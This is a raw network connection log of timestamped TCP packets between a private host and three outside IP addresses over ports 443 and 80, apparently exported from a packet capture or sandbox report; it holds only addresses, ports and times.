Apr 4, 2024 17:49:19.721374035 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:19.721517086 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:19.910782099 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:19.910793066 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:19.910967112 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:19.910979986 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:19.911031008 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:19.934904099 CEST	443	49762	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:19.935035944 CEST	443	49762	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:19.935158968 CEST	49762	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:19.939852953 CEST	49762	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:19.939874887 CEST	443	49762	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:19.971474886 CEST	80	49763	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:19.984498978 CEST	80	49763	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:19.984518051 CEST	80	49763	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:19.984608889 CEST	49763	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:19.984653950 CEST	49763	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:19.999046087 CEST	49765	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:20.018902063 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.018934011 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.019059896 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.019093990 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.019140959 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.115653992 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.115684032 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.115755081 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.115770102 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.115812063 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.115812063 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.189924955 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.189961910 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.190032005 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.190049887 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.190095901 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.246253967 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.246284962 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.246408939 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.246408939 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.246419907 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.246510029 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.263257027 CEST	80	49763	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:20.282937050 CEST	80	49765	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:20.283005953 CEST	49765	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:20.283170938 CEST	49765	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:20.283193111 CEST	49765	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:20.297823906 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.297852039 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.297936916 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.297950983 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.297969103 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.298002958 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.351944923 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.351969957 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.352113962 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.352125883 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.352190018 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.397030115 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.397059917 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.397129059 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.397152901 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.397181988 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.397193909 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.439337015 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.439367056 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.439512014 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.439522028 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.439661026 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.474451065 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.474479914 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.474541903 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.474550962 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.474570990 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.474606037 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.504317999 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.504348993 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.504436016 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.504446030 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.504458904 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.504503012 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.530025959 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.530045986 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.530117989 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.530129910 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.530172110 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.557949066 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.557970047 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.558048010 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.558048010 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.558059931 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.558204889 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.566823959 CEST	80	49765	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:20.580538988 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.580558062 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.580625057 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.580637932 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.580692053 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.580837965 CEST	80	49765	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:20.580898046 CEST	49765	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:20.580971956 CEST	49765	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:20.596451044 CEST	49766	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:20.605568886 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.605596066 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.605667114 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.605668068 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.605675936 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.605766058 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.625739098 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.625761032 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.625839949 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.625852108 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.625901937 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.630593061 CEST	49767	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:20.630634069 CEST	443	49767	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:20.630697966 CEST	49767	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:20.631293058 CEST	49767	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:20.631304979 CEST	443	49767	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:20.645452976 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.645478010 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.645529985 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.645541906 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.645580053 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.645610094 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.667582035 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.667612076 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.667653084 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.667660952 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.667676926 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.667721033 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.685853958 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.685878992 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.685935974 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.685942888 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.685971022 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.685993910 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.706280947 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.706300974 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.706384897 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.706394911 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.706407070 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.706438065 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.723169088 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.723196983 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.723277092 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.723285913 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.723319054 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.723351955 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.740740061 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.740758896 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.740852118 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.740864038 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.740921974 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.758730888 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.758769035 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.758822918 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.758830070 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.758877993 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.758878946 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.773210049 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.773241043 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.773317099 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.773328066 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.773360014 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.774029016 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.787192106 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.787220955 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.787271976 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.787286043 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.787317991 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.788115025 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.801615953 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.801637888 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.801695108 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.801703930 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.801748991 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.801764965 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.819536924 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.819560051 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.819602966 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.819617033 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.819658995 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.819679976 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.828816891 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.828845024 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.828890085 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.828902006 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.828919888 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.828963041 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.844944000 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.844966888 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.845021009 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.845031023 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.845067978 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.846007109 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.854839087 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.854866028 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.854922056 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.854929924 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.854948997 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.855037928 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.864907026 CEST	80	49765	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:20.865957975 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.865978003 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.866084099 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.866084099 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.866096020 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.870033979 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.878223896 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.878246069 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.878303051 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.878310919 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.878320932 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.880999088 CEST	80	49766	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:20.881069899 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.881088972 CEST	49766	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:20.881308079 CEST	49766	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:20.881350994 CEST	49766	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:20.888575077 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.888595104 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.888791084 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.888803959 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.888860941 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.888991117 CEST	443	49767	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:20.889055014 CEST	49767	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:20.890274048 CEST	49767	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:20.890283108 CEST	443	49767	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:20.890544891 CEST	443	49767	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:20.895168066 CEST	49767	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:20.895348072 CEST	49767	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:20.895358086 CEST	443	49767	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:20.899315119 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.899333954 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.899410963 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.899441957 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.899488926 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.909008980 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.909029007 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.909219980 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.909228086 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.909308910 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.919850111 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.919871092 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.920084000 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.920092106 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.920178890 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.928986073 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.929012060 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.929105997 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.929112911 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.929173946 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.938523054 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.938548088 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.938633919 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.938642025 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.938702106 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.948575020 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.948591948 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.948663950 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.948671103 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.948746920 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.957015991 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.957058907 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.957101107 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.957108974 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.957163095 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.965187073 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.965208054 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.965276003 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.965286016 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.965317011 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.965357065 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.974004030 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.974025011 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.974097013 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.974097013 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.974104881 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.974534035 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.982939005 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.982956886 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.983021975 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.983031988 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.983055115 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.983087063 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.990597963 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.990617990 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.990655899 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.990662098 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.990699053 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.990745068 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.999222040 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.999249935 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.999283075 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.999300957 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:20.999317884 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:20.999336958 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.007256031 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.007282972 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.007355928 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.007355928 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.007369995 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.007436037 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.014574051 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.014597893 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.014655113 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.014672995 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.014740944 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.022942066 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.022959948 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.023025990 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.023035049 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.023072958 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.023072958 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.030652046 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.030669928 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.030735016 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.030747890 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.030822992 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.037492990 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.037509918 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.037591934 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.037600040 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.037655115 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.044342041 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.044361115 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.044424057 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.044430971 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.044452906 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.044482946 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.052692890 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.052711964 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.052788019 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.052795887 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.052834988 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.059772015 CEST	443	49760	95.216.179.73	192.168.2.10
